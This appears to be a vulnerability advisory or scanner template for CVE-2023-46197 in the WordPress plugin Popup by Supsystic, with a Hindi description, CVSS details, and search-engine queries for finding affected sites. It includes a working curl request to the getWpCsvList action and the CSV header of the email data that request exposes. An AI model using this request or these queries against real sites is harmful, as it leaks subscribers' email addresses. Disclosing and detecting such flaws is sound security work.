
Popup by Supsystic <= 1.10.19 - प्राधिकरण की कमी से संवेदनशील जानकारी का खुलासा
"वर्डप्रेस के लिए Popup by Supsystic प्लगइन, संस्करण 1.10.19 तक और सहित सभी संस्करणों में, getWpCsvList कार्रवाई के माध्यम से संवेदनशील जानकारी के एक्सपोजर के लिए संवेदनशील है। इससे सब्सक्राइबर स्तर या उससे उच्च पहुँच वाले प्रमाणित हमलावरों के लिए सब्सक्राइबर ईमेल पतों सहित संवेदनशील डेटा निकालना संभव हो जाता है।"
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/id/f458663f-6b1a-4acd-b2db-c66d7a915ab7?source=api-prod
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
cvss-score: 4.3
cve-id: CVE-2023-46197
metadata:
fofa-query: "wp-content/plugins/popup-by-supsystic/"
google-query: inurl:"/wp-content/plugins/popup-by-supsystic/"
shodan-query: 'vuln:CVE-2023-46197'
slug: 'popup-by-supsystic'
curl "http://wordpress.lan/?mod=subscribe&action=getWpCsvList&pl=pps"
"Username";"Email";"Activated";"PopUp ID";"Date Created"